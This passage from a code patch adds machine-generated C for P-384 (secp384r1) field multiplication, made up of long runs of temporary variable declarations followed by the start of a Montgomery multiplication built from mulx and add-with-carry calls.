fiat_secp384r1_uint1 x802; ++ uint32_t x803; ++ fiat_secp384r1_uint1 x804; ++ uint32_t x805; ++ fiat_secp384r1_uint1 x806; ++ uint32_t x807; ++ uint32_t x808; ++ uint32_t x809; ++ uint32_t x810; ++ uint32_t x811; ++ uint32_t x812; ++ uint32_t x813; ++ uint32_t x814; ++ uint32_t x815; ++ uint32_t x816; ++ uint32_t x817; ++ uint32_t x818; ++ uint32_t x819; ++ uint32_t x820; ++ uint32_t x821; ++ uint32_t x822; ++ uint32_t x823; ++ uint32_t x824; ++ uint32_t x825; ++ uint32_t x826; ++ uint32_t x827; ++ uint32_t x828; ++ uint32_t x829; ++ uint32_t x830; ++ uint32_t x831; ++ uint32_t x832; ++ fiat_secp384r1_uint1 x833; ++ uint32_t x834; ++ fiat_secp384r1_uint1 x835; ++ uint32_t x836; ++ fiat_secp384r1_uint1 x837; ++ uint32_t x838; ++ fiat_secp384r1_uint1 x839; ++ uint32_t x840; ++ fiat_secp384r1_uint1 x841; ++ uint32_t x842; ++ fiat_secp384r1_uint1 x843; ++ uint32_t x844; ++ fiat_secp384r1_uint1 x845; ++ uint32_t x846; ++ fiat_secp384r1_uint1 x847; ++ uint32_t x848; ++ fiat_secp384r1_uint1 x849; ++ uint32_t x850; ++ fiat_secp384r1_uint1 x851; ++ uint32_t x852; ++ fiat_secp384r1_uint1 x853; ++ uint32_t x854; ++ uint32_t x855; ++ fiat_secp384r1_uint1 x856; ++ uint32_t x857; ++ fiat_secp384r1_uint1 x858; ++ uint32_t x859; ++ fiat_secp384r1_uint1 x860; ++ uint32_t x861; ++ fiat_secp384r1_uint1 x862; ++ uint32_t x863; ++ fiat_secp384r1_uint1 x864; ++ uint32_t x865; ++ fiat_secp384r1_uint1 x866; ++ uint32_t x867; ++ fiat_secp384r1_uint1 x868; ++ uint32_t x869; ++ fiat_secp384r1_uint1 x870; ++ uint32_t x871; ++ fiat_secp384r1_uint1 x872; ++ uint32_t x873; ++ fiat_secp384r1_uint1 x874; ++ uint32_t x875; ++ fiat_secp384r1_uint1 x876; ++ uint32_t x877; ++ fiat_secp384r1_uint1 x878; ++ uint32_t x879; ++ fiat_secp384r1_uint1 x880; ++ uint32_t x881; ++ uint32_t x882; ++ uint32_t x883; ++ uint32_t x884; ++ uint32_t x885; ++ uint32_t x886; ++ uint32_t x887; ++ uint32_t x888; ++ uint32_t x889; ++ uint32_t x890; ++ uint32_t x891; ++ uint32_t x892; ++ uint32_t x893; ++ uint32_t x894; ++ uint32_t x895; ++ uint32_t x896; ++ uint32_t x897; ++ uint32_t x898; ++ uint32_t x899; ++ uint32_t x900; ++ uint32_t x901; ++ fiat_secp384r1_uint1 x902; ++ uint32_t x903; ++ fiat_secp384r1_uint1 x904; ++ uint32_t x905; ++ fiat_secp384r1_uint1 x906; ++ uint32_t x907; ++ fiat_secp384r1_uint1 x908; ++ uint32_t x909; ++ fiat_secp384r1_uint1 x910; ++ uint32_t x911; ++ fiat_secp384r1_uint1 x912; ++ uint32_t x913; ++ fiat_secp384r1_uint1 x914; ++ uint32_t x915; ++ fiat_secp384r1_uint1 x916; ++ uint32_t x917; ++ uint32_t x918; ++ fiat_secp384r1_uint1 x919; ++ uint32_t x920; ++ fiat_secp384r1_uint1 x921; ++ uint32_t x922; ++ fiat_secp384r1_uint1 x923; ++ uint32_t x924; ++ fiat_secp384r1_uint1 x925; ++ uint32_t x926; ++ fiat_secp384r1_uint1 x927; ++ uint32_t x928; ++ fiat_secp384r1_uint1 x929; ++ uint32_t x930; ++ fiat_secp384r1_uint1 x931; ++ uint32_t x932; ++ fiat_secp384r1_uint1 x933; ++ uint32_t x934; ++ fiat_secp384r1_uint1 x935; ++ uint32_t x936; ++ fiat_secp384r1_uint1 x937; ++ uint32_t x938; ++ fiat_secp384r1_uint1 x939; ++ uint32_t x940; ++ fiat_secp384r1_uint1 x941; ++ uint32_t x942; ++ fiat_secp384r1_uint1 x943; ++ uint32_t x944; ++ uint32_t x945; ++ uint32_t x946; ++ uint32_t x947; ++ uint32_t x948; ++ uint32_t x949; ++ uint32_t x950; ++ uint32_t x951; ++ uint32_t x952; ++ uint32_t x953; ++ uint32_t x954; ++ uint32_t x955; ++ uint32_t x956; ++ uint32_t x957; ++ uint32_t x958; ++ uint32_t x959; ++ uint32_t x960; ++ uint32_t x961; ++ uint32_t x962; ++ uint32_t x963; ++ uint32_t x964; ++ uint32_t x965; ++ uint32_t x966; ++ uint32_t x967; ++ uint32_t x968; ++ uint32_t x969; ++ fiat_secp384r1_uint1 x970; ++ uint32_t x971; ++ fiat_secp384r1_uint1 x972; ++ uint32_t x973; ++ fiat_secp384r1_uint1 x974; ++ uint32_t x975; ++ fiat_secp384r1_uint1 x976; ++ uint32_t x977; ++ fiat_secp384r1_uint1 x978; ++ uint32_t x979; ++ fiat_secp384r1_uint1 x980; ++ uint32_t x981; ++ fiat_secp384r1_uint1 x982; ++ uint32_t x983; ++ fiat_secp384r1_uint1 x984; ++ uint32_t x985; ++ fiat_secp384r1_uint1 x986; ++ uint32_t x987; ++ fiat_secp384r1_uint1 x988; ++ uint32_t x989; ++ fiat_secp384r1_uint1 x990; ++ uint32_t x991; ++ uint32_t x992; ++ fiat_secp384r1_uint1 x993; ++ uint32_t x994; ++ fiat_secp384r1_uint1 x995; ++ uint32_t x996; ++ fiat_secp384r1_uint1 x997; ++ uint32_t x998; ++ fiat_secp384r1_uint1 x999; ++ uint32_t x1000; ++ fiat_secp384r1_uint1 x1001; ++ uint32_t x1002; ++ fiat_secp384r1_uint1 x1003; ++ uint32_t x1004; ++ fiat_secp384r1_uint1 x1005; ++ uint32_t x1006; ++ fiat_secp384r1_uint1 x1007; ++ uint32_t x1008; ++ fiat_secp384r1_uint1 x1009; ++ uint32_t x1010; ++ fiat_secp384r1_uint1 x1011; ++ uint32_t x1012; ++ fiat_secp384r1_uint1 x1013; ++ uint32_t x1014; ++ fiat_secp384r1_uint1 x1015; ++ uint32_t x1016; ++ fiat_secp384r1_uint1 x1017; ++ uint32_t x1018; ++ uint32_t x1019; ++ uint32_t x1020; ++ uint32_t x1021; ++ uint32_t x1022; ++ uint32_t x1023; ++ uint32_t x1024; ++ uint32_t x1025; ++ uint32_t x1026; ++ uint32_t x1027; ++ uint32_t x1028; ++ uint32_t x1029; ++ uint32_t x1030; ++ uint32_t x1031; ++ uint32_t x1032; ++ uint32_t x1033; ++ uint32_t x1034; ++ uint32_t x1035; ++ uint32_t x1036; ++ uint32_t x1037; ++ uint32_t x1038; ++ fiat_secp384r1_uint1 x1039; ++ uint32_t x1040; ++ fiat_secp384r1_uint1 x1041; ++ uint32_t x1042; ++ fiat_secp384r1_uint1 x1043; ++ uint32_t x1044; ++ fiat_secp384r1_uint1 x1045; ++ uint32_t x1046; ++ fiat_secp384r1_uint1 x1047; ++ uint32_t x1048; ++ fiat_secp384r1_uint1 x1049; ++ uint32_t x1050; ++ fiat_secp384r1_uint1 x1051; ++ uint32_t x1052; ++ fiat_secp384r1_uint1 x1053; ++ uint32_t x1054; ++ uint32_t x1055; ++ fiat_secp384r1_uint1 x1056; ++ uint32_t x1057; ++ fiat_secp384r1_uint1 x1058; ++ uint32_t x1059; ++ fiat_secp384r1_uint1 x1060; ++ uint32_t x1061; ++ fiat_secp384r1_uint1 x1062; ++ uint32_t x1063; ++ fiat_secp384r1_uint1 x1064; ++ uint32_t x1065; ++ fiat_secp384r1_uint1 x1066; ++ uint32_t x1067; ++ fiat_secp384r1_uint1 x1068; ++ uint32_t x1069; ++ fiat_secp384r1_uint1 x1070; ++ uint32_t x1071; ++ fiat_secp384r1_uint1 x1072; ++ uint32_t x1073; ++ fiat_secp384r1_uint1 x1074; ++ uint32_t x1075; ++ fiat_secp384r1_uint1 x1076; ++ uint32_t x1077; ++ fiat_secp384r1_uint1 x1078; ++ uint32_t x1079; ++ fiat_secp384r1_uint1 x1080; ++ uint32_t x1081; ++ uint32_t x1082; ++ uint32_t x1083; ++ uint32_t x1084; ++ uint32_t x1085; ++ uint32_t x1086; ++ uint32_t x1087; ++ uint32_t x1088; ++ uint32_t x1089; ++ uint32_t x1090; ++ uint32_t x1091; ++ uint32_t x1092; ++ uint32_t x1093; ++ uint32_t x1094; ++ uint32_t x1095; ++ uint32_t x1096; ++ uint32_t x1097; ++ uint32_t x1098; ++ uint32_t x1099; ++ uint32_t x1100; ++ uint32_t x1101; ++ uint32_t x1102; ++ uint32_t x1103; ++ uint32_t x1104; ++ uint32_t x1105; ++ uint32_t x1106; ++ fiat_secp384r1_uint1 x1107; ++ uint32_t x1108; ++ fiat_secp384r1_uint1 x1109; ++ uint32_t x1110; ++ fiat_secp384r1_uint1 x1111; ++ uint32_t x1112; ++ fiat_secp384r1_uint1 x1113; ++ uint32_t x1114; ++ fiat_secp384r1_uint1 x1115; ++ uint32_t x1116; ++ fiat_secp384r1_uint1 x1117; ++ uint32_t x1118; ++ fiat_secp384r1_uint1 x1119; ++ uint32_t x1120; ++ fiat_secp384r1_uint1 x1121; ++ uint32_t x1122; ++ fiat_secp384r1_uint1 x1123; ++ uint32_t x1124; ++ fiat_secp384r1_uint1 x1125; ++ uint32_t x1126; ++ fiat_secp384r1_uint1 x1127; ++ uint32_t x1128; ++ uint32_t x1129; ++ fiat_secp384r1_uint1 x1130; ++ uint32_t x1131; ++ fiat_secp384r1_uint1 x1132; ++ uint32_t x1133; ++ fiat_secp384r1_uint1 x1134; ++ uint32_t x1135; ++ fiat_secp384r1_uint1 x1136; ++ uint32_t x1137; ++ fiat_secp384r1_uint1 x1138; ++ uint32_t x1139; ++ fiat_secp384r1_uint1 x1140; ++ uint32_t x1141; ++ fiat_secp384r1_uint1 x1142; ++ uint32_t x1143; ++ fiat_secp384r1_uint1 x1144; ++ uint32_t x1145; ++ fiat_secp384r1_uint1 x1146; ++ uint32_t x1147; ++ fiat_secp384r1_uint1 x1148; ++ uint32_t x1149; ++ fiat_secp384r1_uint1 x1150; ++ uint32_t x1151; ++ fiat_secp384r1_uint1 x1152; ++ uint32_t x1153; ++ fiat_secp384r1_uint1 x1154; ++ uint32_t x1155; ++ uint32_t x1156; ++ uint32_t x1157; ++ uint32_t x1158; ++ uint32_t x1159; ++ uint32_t x1160; ++ uint32_t x1161; ++ uint32_t x1162; ++ uint32_t x1163; ++ uint32_t x1164; ++ uint32_t x1165; ++ uint32_t x1166; ++ uint32_t x1167; ++ uint32_t x1168; ++ uint32_t x1169; ++ uint32_t x1170; ++ uint32_t x1171; ++ uint32_t x1172; ++ uint32_t x1173; ++ uint32_t x1174; ++ uint32_t x1175; ++ fiat_secp384r1_uint1 x1176; ++ uint32_t x1177; ++ fiat_secp384r1_uint1 x1178; ++ uint32_t x1179; ++ fiat_secp384r1_uint1 x1180; ++ uint32_t x1181; ++ fiat_secp384r1_uint1 x1182; ++ uint32_t x1183; ++ fiat_secp384r1_uint1 x1184; ++ uint32_t x1185; ++ fiat_secp384r1_uint1 x1186; ++ uint32_t x1187; ++ fiat_secp384r1_uint1 x1188; ++ uint32_t x1189; ++ fiat_secp384r1_uint1 x1190; ++ uint32_t x1191; ++ uint32_t x1192; ++ fiat_secp384r1_uint1 x1193; ++ uint32_t x1194; ++ fiat_secp384r1_uint1 x1195; ++ uint32_t x1196; ++ fiat_secp384r1_uint1 x1197; ++ uint32_t x1198; ++ fiat_secp384r1_uint1 x1199; ++ uint32_t x1200; ++ fiat_secp384r1_uint1 x1201; ++ uint32_t x1202; ++ fiat_secp384r1_uint1 x1203; ++ uint32_t x1204; ++ fiat_secp384r1_uint1 x1205; ++ uint32_t x1206; ++ fiat_secp384r1_uint1 x1207; ++ uint32_t x1208; ++ fiat_secp384r1_uint1 x1209; ++ uint32_t x1210; ++ fiat_secp384r1_uint1 x1211; ++ uint32_t x1212; ++ fiat_secp384r1_uint1 x1213; ++ uint32_t x1214; ++ fiat_secp384r1_uint1 x1215; ++ uint32_t x1216; ++ fiat_secp384r1_uint1 x1217; ++ uint32_t x1218; ++ uint32_t x1219; ++ uint32_t x1220; ++ uint32_t x1221; ++ uint32_t x1222; ++ uint32_t x1223; ++ uint32_t x1224; ++ uint32_t x1225; ++ uint32_t x1226; ++ uint32_t x1227; ++ uint32_t x1228; ++ uint32_t x1229; ++ uint32_t x1230; ++ uint32_t x1231; ++ uint32_t x1232; ++ uint32_t x1233; ++ uint32_t x1234; ++ uint32_t x1235; ++ uint32_t x1236; ++ uint32_t x1237; ++ uint32_t x1238; ++ uint32_t x1239; ++ uint32_t x1240; ++ uint32_t x1241; ++ uint32_t x1242; ++ uint32_t x1243; ++ fiat_secp384r1_uint1 x1244; ++ uint32_t x1245; ++ fiat_secp384r1_uint1 x1246; ++ uint32_t x1247; ++ fiat_secp384r1_uint1 x1248; ++ uint32_t x1249; ++ fiat_secp384r1_uint1 x1250; ++ uint32_t x1251; ++ fiat_secp384r1_uint1 x1252; ++ uint32_t x1253; ++ fiat_secp384r1_uint1 x1254; ++ uint32_t x1255; ++ fiat_secp384r1_uint1 x1256; ++ uint32_t x1257; ++ fiat_secp384r1_uint1 x1258; ++ uint32_t x1259; ++ fiat_secp384r1_uint1 x1260; ++ uint32_t x1261; ++ fiat_secp384r1_uint1 x1262; ++ uint32_t x1263; ++ fiat_secp384r1_uint1 x1264; ++ uint32_t x1265; ++ uint32_t x1266; ++ fiat_secp384r1_uint1 x1267; ++ uint32_t x1268; ++ fiat_secp384r1_uint1 x1269; ++ uint32_t x1270; ++ fiat_secp384r1_uint1 x1271; ++ uint32_t x1272; ++ fiat_secp384r1_uint1 x1273; ++ uint32_t x1274; ++ fiat_secp384r1_uint1 x1275; ++ uint32_t x1276; ++ fiat_secp384r1_uint1 x1277; ++ uint32_t x1278; ++ fiat_secp384r1_uint1 x1279; ++ uint32_t x1280; ++ fiat_secp384r1_uint1 x1281; ++ uint32_t x1282; ++ fiat_secp384r1_uint1 x1283; ++ uint32_t x1284; ++ fiat_secp384r1_uint1 x1285; ++ uint32_t x1286; ++ fiat_secp384r1_uint1 x1287; ++ uint32_t x1288; ++ fiat_secp384r1_uint1 x1289; ++ uint32_t x1290; ++ fiat_secp384r1_uint1 x1291; ++ uint32_t x1292; ++ uint32_t x1293; ++ uint32_t x1294; ++ uint32_t x1295; ++ uint32_t x1296; ++ uint32_t x1297; ++ uint32_t x1298; ++ uint32_t x1299; ++ uint32_t x1300; ++ uint32_t x1301; ++ uint32_t x1302; ++ uint32_t x1303; ++ uint32_t x1304; ++ uint32_t x1305; ++ uint32_t x1306; ++ uint32_t x1307; ++ uint32_t x1308; ++ uint32_t x1309; ++ uint32_t x1310; ++ uint32_t x1311; ++ uint32_t x1312; ++ fiat_secp384r1_uint1 x1313; ++ uint32_t x1314; ++ fiat_secp384r1_uint1 x1315; ++ uint32_t x1316; ++ fiat_secp384r1_uint1 x1317; ++ uint32_t x1318; ++ fiat_secp384r1_uint1 x1319; ++ uint32_t x1320; ++ fiat_secp384r1_uint1 x1321; ++ uint32_t x1322; ++ fiat_secp384r1_uint1 x1323; ++ uint32_t x1324; ++ fiat_secp384r1_uint1 x1325; ++ uint32_t x1326; ++ fiat_secp384r1_uint1 x1327; ++ uint32_t x1328; ++ uint32_t x1329; ++ fiat_secp384r1_uint1 x1330; ++ uint32_t x1331; ++ fiat_secp384r1_uint1 x1332; ++ uint32_t x1333; ++ fiat_secp384r1_uint1 x1334; ++ uint32_t x1335; ++ fiat_secp384r1_uint1 x1336; ++ uint32_t x1337; ++ fiat_secp384r1_uint1 x1338; ++ uint32_t x1339; ++ fiat_secp384r1_uint1 x1340; ++ uint32_t x1341; ++ fiat_secp384r1_uint1 x1342; ++ uint32_t x1343; ++ fiat_secp384r1_uint1 x1344; ++ uint32_t x1345; ++ fiat_secp384r1_uint1 x1346; ++ uint32_t x1347; ++ fiat_secp384r1_uint1 x1348; ++ uint32_t x1349; ++ fiat_secp384r1_uint1 x1350; ++ uint32_t x1351; ++ fiat_secp384r1_uint1 x1352; ++ uint32_t x1353; ++ fiat_secp384r1_uint1 x1354; ++ uint32_t x1355; ++ uint32_t x1356; ++ uint32_t x1357; ++ uint32_t x1358; ++ uint32_t x1359; ++ uint32_t x1360; ++ uint32_t x1361; ++ uint32_t x1362; ++ uint32_t x1363; ++ uint32_t x1364; ++ uint32_t x1365; ++ uint32_t x1366; ++ uint32_t x1367; ++ uint32_t x1368; ++ uint32_t x1369; ++ uint32_t x1370; ++ uint32_t x1371; ++ uint32_t x1372; ++ uint32_t x1373; ++ uint32_t x1374; ++ uint32_t x1375; ++ uint32_t x1376; ++ uint32_t x1377; ++ uint32_t x1378; ++ uint32_t x1379; ++ uint32_t x1380; ++ fiat_secp384r1_uint1 x1381; ++ uint32_t x1382; ++ fiat_secp384r1_uint1 x1383; ++ uint32_t x1384; ++ fiat_secp384r1_uint1 x1385; ++ uint32_t x1386; ++ fiat_secp384r1_uint1 x1387; ++ uint32_t x1388; ++ fiat_secp384r1_uint1 x1389; ++ uint32_t x1390; ++ fiat_secp384r1_uint1 x1391; ++ uint32_t x1392; ++ fiat_secp384r1_uint1 x1393; ++ uint32_t x1394; ++ fiat_secp384r1_uint1 x1395; ++ uint32_t x1396; ++ fiat_secp384r1_uint1 x1397; ++ uint32_t x1398; ++ fiat_secp384r1_uint1 x1399; ++ uint32_t x1400; ++ fiat_secp384r1_uint1 x1401; ++ uint32_t x1402; ++ uint32_t x1403; ++ fiat_secp384r1_uint1 x1404; ++ uint32_t x1405; ++ fiat_secp384r1_uint1 x1406; ++ uint32_t x1407; ++ fiat_secp384r1_uint1 x1408; ++ uint32_t x1409; ++ fiat_secp384r1_uint1 x1410; ++ uint32_t x1411; ++ fiat_secp384r1_uint1 x1412; ++ uint32_t x1413; ++ fiat_secp384r1_uint1 x1414; ++ uint32_t x1415; ++ fiat_secp384r1_uint1 x1416; ++ uint32_t x1417; ++ fiat_secp384r1_uint1 x1418; ++ uint32_t x1419; ++ fiat_secp384r1_uint1 x1420; ++ uint32_t x1421; ++ fiat_secp384r1_uint1 x1422; ++ uint32_t x1423; ++ fiat_secp384r1_uint1 x1424; ++ uint32_t x1425; ++ fiat_secp384r1_uint1 x1426; ++ uint32_t x1427; ++ fiat_secp384r1_uint1 x1428; ++ uint32_t x1429; ++ uint32_t x1430; ++ uint32_t x1431; ++ uint32_t x1432; ++ uint32_t x1433; ++ uint32_t x1434; ++ uint32_t x1435; ++ uint32_t x1436; ++ uint32_t x1437; ++ uint32_t x1438; ++ uint32_t x1439; ++ uint32_t x1440; ++ uint32_t x1441; ++ uint32_t x1442; ++ uint32_t x1443; ++ uint32_t x1444; ++ uint32_t x1445; ++ uint32_t x1446; ++ uint32_t x1447; ++ uint32_t x1448; ++ uint32_t x1449; ++ fiat_secp384r1_uint1 x1450; ++ uint32_t x1451; ++ fiat_secp384r1_uint1 x1452; ++ uint32_t x1453; ++ fiat_secp384r1_uint1 x1454; ++ uint32_t x1455; ++ fiat_secp384r1_uint1 x1456; ++ uint32_t x1457; ++ fiat_secp384r1_uint1 x1458; ++ uint32_t x1459; ++ fiat_secp384r1_uint1 x1460; ++ uint32_t x1461; ++ fiat_secp384r1_uint1 x1462; ++ uint32_t x1463; ++ fiat_secp384r1_uint1 x1464; ++ uint32_t x1465; ++ uint32_t x1466; ++ fiat_secp384r1_uint1 x1467; ++ uint32_t x1468; ++ fiat_secp384r1_uint1 x1469; ++ uint32_t x1470; ++ fiat_secp384r1_uint1 x1471; ++ uint32_t x1472; ++ fiat_secp384r1_uint1 x1473; ++ uint32_t x1474; ++ fiat_secp384r1_uint1 x1475; ++ uint32_t x1476; ++ fiat_secp384r1_uint1 x1477; ++ uint32_t x1478; ++ fiat_secp384r1_uint1 x1479; ++ uint32_t x1480; ++ fiat_secp384r1_uint1 x1481; ++ uint32_t x1482; ++ fiat_secp384r1_uint1 x1483; ++ uint32_t x1484; ++ fiat_secp384r1_uint1 x1485; ++ uint32_t x1486; ++ fiat_secp384r1_uint1 x1487; ++ uint32_t x1488; ++ fiat_secp384r1_uint1 x1489; ++ uint32_t x1490; ++ fiat_secp384r1_uint1 x1491; ++ uint32_t x1492; ++ uint32_t x1493; ++ uint32_t x1494; ++ uint32_t x1495; ++ uint32_t x1496; ++ uint32_t x1497; ++ uint32_t x1498; ++ uint32_t x1499; ++ uint32_t x1500; ++ uint32_t x1501; ++ uint32_t x1502; ++ uint32_t x1503; ++ uint32_t x1504; ++ uint32_t x1505; ++ uint32_t x1506; ++ uint32_t x1507; ++ uint32_t x1508; ++ uint32_t x1509; ++ uint32_t x1510; ++ uint32_t x1511; ++ uint32_t x1512; ++ uint32_t x1513; ++ uint32_t x1514; ++ uint32_t x1515; ++ uint32_t x1516; ++ uint32_t x1517; ++ fiat_secp384r1_uint1 x1518; ++ uint32_t x1519; ++ fiat_secp384r1_uint1 x1520; ++ uint32_t x1521; ++ fiat_secp384r1_uint1 x1522; ++ uint32_t x1523; ++ fiat_secp384r1_uint1 x1524; ++ uint32_t x1525; ++ fiat_secp384r1_uint1 x1526; ++ uint32_t x1527; ++ fiat_secp384r1_uint1 x1528; ++ uint32_t x1529; ++ fiat_secp384r1_uint1 x1530; ++ uint32_t x1531; ++ fiat_secp384r1_uint1 x1532; ++ uint32_t x1533; ++ fiat_secp384r1_uint1 x1534; ++ uint32_t x1535; ++ fiat_secp384r1_uint1 x1536; ++ uint32_t x1537; ++ fiat_secp384r1_uint1 x1538; ++ uint32_t x1539; ++ uint32_t x1540; ++ fiat_secp384r1_uint1 x1541; ++ uint32_t x1542; ++ fiat_secp384r1_uint1 x1543; ++ uint32_t x1544; ++ fiat_secp384r1_uint1 x1545; ++ uint32_t x1546; ++ fiat_secp384r1_uint1 x1547; ++ uint32_t x1548; ++ fiat_secp384r1_uint1 x1549; ++ uint32_t x1550; ++ fiat_secp384r1_uint1 x1551; ++ uint32_t x1552; ++ fiat_secp384r1_uint1 x1553; ++ uint32_t x1554; ++ fiat_secp384r1_uint1 x1555; ++ uint32_t x1556; ++ fiat_secp384r1_uint1 x1557; ++ uint32_t x1558; ++ fiat_secp384r1_uint1 x1559; ++ uint32_t x1560; ++ fiat_secp384r1_uint1 x1561; ++ uint32_t x1562; ++ fiat_secp384r1_uint1 x1563; ++ uint32_t x1564; ++ fiat_secp384r1_uint1 x1565; ++ uint32_t x1566; ++ uint32_t x1567; ++ uint32_t x1568; ++ uint32_t x1569; ++ uint32_t x1570; ++ uint32_t x1571; ++ uint32_t x1572; ++ uint32_t x1573; ++ uint32_t x1574; ++ uint32_t x1575; ++ uint32_t x1576; ++ uint32_t x1577; ++ uint32_t x1578; ++ uint32_t x1579; ++ uint32_t x1580; ++ uint32_t x1581; ++ uint32_t x1582; ++ uint32_t x1583; ++ uint32_t x1584; ++ uint32_t x1585; ++ uint32_t x1586; ++ fiat_secp384r1_uint1 x1587; ++ uint32_t x1588; ++ fiat_secp384r1_uint1 x1589; ++ uint32_t x1590; ++ fiat_secp384r1_uint1 x1591; ++ uint32_t x1592; ++ fiat_secp384r1_uint1 x1593; ++ uint32_t x1594; ++ fiat_secp384r1_uint1 x1595; ++ uint32_t x1596; ++ fiat_secp384r1_uint1 x1597; ++ uint32_t x1598; ++ fiat_secp384r1_uint1 x1599; ++ uint32_t x1600; ++ fiat_secp384r1_uint1 x1601; ++ uint32_t x1602; ++ uint32_t x1603; ++ fiat_secp384r1_uint1 x1604; ++ uint32_t x1605; ++ fiat_secp384r1_uint1 x1606; ++ uint32_t x1607; ++ fiat_secp384r1_uint1 x1608; ++ uint32_t x1609; ++ fiat_secp384r1_uint1 x1610; ++ uint32_t x1611; ++ fiat_secp384r1_uint1 x1612; ++ uint32_t x1613; ++ fiat_secp384r1_uint1 x1614; ++ uint32_t x1615; ++ fiat_secp384r1_uint1 x1616; ++ uint32_t x1617; ++ fiat_secp384r1_uint1 x1618; ++ uint32_t x1619; ++ fiat_secp384r1_uint1 x1620; ++ uint32_t x1621; ++ fiat_secp384r1_uint1 x1622; ++ uint32_t x1623; ++ fiat_secp384r1_uint1 x1624; ++ uint32_t x1625; ++ fiat_secp384r1_uint1 x1626; ++ uint32_t x1627; ++ fiat_secp384r1_uint1 x1628; ++ uint32_t x1629; ++ uint32_t x1630; ++ fiat_secp384r1_uint1 x1631; ++ uint32_t x1632; ++ fiat_secp384r1_uint1 x1633; ++ uint32_t x1634; ++ fiat_secp384r1_uint1 x1635; ++ uint32_t x1636; ++ fiat_secp384r1_uint1 x1637; ++ uint32_t x1638; ++ fiat_secp384r1_uint1 x1639; ++ uint32_t x1640; ++ fiat_secp384r1_uint1 x1641; ++ uint32_t x1642; ++ fiat_secp384r1_uint1 x1643; ++ uint32_t x1644; ++ fiat_secp384r1_uint1 x1645; ++ uint32_t x1646; ++ fiat_secp384r1_uint1 x1647; ++ uint32_t x1648; ++ fiat_secp384r1_uint1 x1649; ++ uint32_t x1650; ++ fiat_secp384r1_uint1 x1651; ++ uint32_t x1652; ++ fiat_secp384r1_uint1 x1653; ++ uint32_t x1654; ++ fiat_secp384r1_uint1 x1655; ++ uint32_t x1656; ++ uint32_t x1657; ++ uint32_t x1658; ++ uint32_t x1659; ++ uint32_t x1660; ++ uint32_t x1661; ++ uint32_t x1662; ++ uint32_t x1663; ++ uint32_t x1664; ++ uint32_t x1665; ++ uint32_t x1666; ++ uint32_t x1667; ++ x1 = (arg1[1]); ++ x2 = (arg1[2]); ++ x3 = (arg1[3]); ++ x4 = (arg1[4]); ++ x5 = (arg1[5]); ++ x6 = (arg1[6]); ++ x7 = (arg1[7]); ++ x8 = (arg1[8]); ++ x9 = (arg1[9]); ++ x10 = (arg1[10]); ++ x11 = (arg1[11]); ++ x12 = (arg1[0]); ++ fiat_secp384r1_mulx_u32(&x13, &x14, x12, (arg2[11])); ++ fiat_secp384r1_mulx_u32(&x15, &x16, x12, (arg2[10])); ++ fiat_secp384r1_mulx_u32(&x17, &x18, x12, (arg2[9])); ++ fiat_secp384r1_mulx_u32(&x19, &x20, x12, (arg2[8])); ++ fiat_secp384r1_mulx_u32(&x21, &x22, x12, (arg2[7])); ++ fiat_secp384r1_mulx_u32(&x23, &x24, x12, (arg2[6])); ++ fiat_secp384r1_mulx_u32(&x25, &x26, x12, (arg2[5])); ++ fiat_secp384r1_mulx_u32(&x27, &x28, x12, (arg2[4])); ++ fiat_secp384r1_mulx_u32(&x29, &x30, x12, (arg2[3])); ++ fiat_secp384r1_mulx_u32(&x31, &x32, x12, (arg2[2])); ++ fiat_secp384r1_mulx_u32(&x33, &x34, x12, (arg2[1])); ++ fiat_secp384r1_mulx_u32(&x35, &x36, x12, (arg2[0])); ++ fiat_secp384r1_addcarryx_u32(&x37, &x38, 0x0, x36, x33); ++ fiat_secp384r1_addcarryx_u32(&x39, &x40, x38, x34, x31); ++ fiat_secp384r1_addcarryx_u32(&x41, &x42, x40, x32, x29); ++ fiat_secp384r1_addcarryx_u32(&x43, &x44, x42, x30, x27); ++ fiat_secp384r1_addcarryx_u32(&x45, &x46, x44, x28, x25); ++ fiat_secp384r1_addcarryx_u32(&x47, &x48, x46, x26, x23); ++ fiat_secp384r1_addcarryx_u32(&x49, &x50, x48, x24, x21); ++ fiat_secp384r1_addcarryx_u32(&x51, &x52, x50, x22, x19); ++ fiat_secp384r1_addcarryx_u32(&x53, &x54, x52, x20, x17); ++ fiat_secp384r1_addcarryx_u32(&x55, &x56, x54, x18, x15); ++ fiat_secp384r1_addcarryx_u32(&x57, &x58, x56, x16, x13); ++ x59 = (x58 + x14); ++ fiat_secp384r1_mulx_u32(&x60, &x61, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x62, &x63, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x64, &x65, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x66, &x67, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x68, &x69, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x70, &x71, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x72, &x73, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x74, &x75, x35, UINT32_C(0xfffffffe)); ++ fiat_secp384r1_mulx_u32(&x76, &x77, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_mulx_u32(&x78, &x79, x35, UINT32_C(0xffffffff)); ++ fiat_secp384r1_addcarryx_u32(&x80, &x81, 0x0, x77, x74); ++ fiat_secp384r1_addcarryx_u32(&x82, &x83, x81, x75, x72); ++ fiat_secp384r1_addcarryx_u32(&x84, &x85, x83, x73, x70); ++ fiat_secp384r1_addcarryx_u32(&x86, &x87, x85, x71, x68); ++ fiat_secp384r1_addcarryx_u32(&x88, &x89, x87, x69, x66); ++ fiat_secp384r1_addcarryx_u32(&x90, &x91, x89, x67, x64); ++ fiat_secp384r1_addcarryx_u32(&x92, &x93, x91, x65, x62); ++ fiat_secp384r1_addcarryx_u32(&x94, &x95, x93, x63, x60); ++ x96 = (x95 + x61); ++ fiat_secp384r1_addcarryx_u32(&x97, &x98, 0x0, x35, x78); ++ fiat_secp384r1_addcarryx_u32(&x99, &x100, x98, x37, x79); ++ fiat_secp384r1_addcarryx_u32(&x101, &x102, x100, x39, 0x0); ++ fiat_secp384r1_addcarryx_u32(&x103, &x104, x102, x41, x76); ++ fiat_secp384r1_addcarryx_u32(&x105, &x106, x104, x43, x80); ++ fiat_secp384r1_addcarryx_u32(&x107, &x108, x106, x45, x82); ++ fiat_secp384r1_addcarryx_u32(&x109, &x110, x108, x47, x84); ++ fiat_secp384r1_addcarryx_u32(&x111, &x112, x110, x49, x86); ++ fiat_secp384r1_addcarryx_u32(&x113, &x114, x112, 